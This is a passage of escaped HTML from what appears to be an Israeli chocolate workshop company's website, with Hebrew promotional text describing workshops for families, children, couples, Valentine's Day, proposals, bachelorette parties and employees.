href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\"><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea<\\/u><\\/a> \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a> \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea<\\/a> \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\\\">\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a>. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2<\\/a> \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/valentine-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4<\\/a> \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/propsal-at-chocolate-workshop\\/\\\">\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/a><br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\\\">\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea?<\\/a> \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd 